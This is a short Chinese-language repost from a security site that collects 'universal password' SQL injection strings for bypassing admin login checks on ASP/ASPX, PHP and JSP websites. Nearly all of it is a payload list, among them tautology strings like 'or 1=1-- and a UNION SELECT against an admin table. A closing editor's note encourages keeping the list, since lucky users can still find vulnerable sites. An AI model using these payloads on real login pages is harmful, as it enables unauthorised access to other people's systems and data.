万能密码漏洞利用

【脚本漏洞】所谓万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站所以称之为万能。

自己也有过收集,别人总结的我又添加了几个

asp aspx万能密码

1:”or “a”=”a
2: ‘)or(‘a’=’a
3:or 1=1–
4:’or 1=1–
5:a’or’ 1=1–
6:”or 1=1–
7:’or’a’=’a
8:”or”=”a’=’a
9:’or”=’
10:’or’=’or’
11: 1 or ‘1’=’1’=1
12: 1 or ‘1’=’1′ or 1=1
13: ‘OR 1=1%00
14: “or 1=1%00
15: ‘xor
16: 用户名 ‘ UNION Select 1,1,1 FROM admin Where ”=’ (替换表名admin)
密码 1

17..admin’ or ‘a’=’a 密码随便
PHP万能密码

‘or 1=1/*

User: something
Pass: ‘ OR ‘1’=’1

jsp 万能密码

1’or’1’=’1

admin’ OR 1=1/*

小编注:虽然现在能用”万能密码”进的网站已经很少了,但是有时运气好还是能碰到的,万能密码能给我们省不少事,蛮记录一下,说不定某天就用到了.呵呵.

转自网络由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理.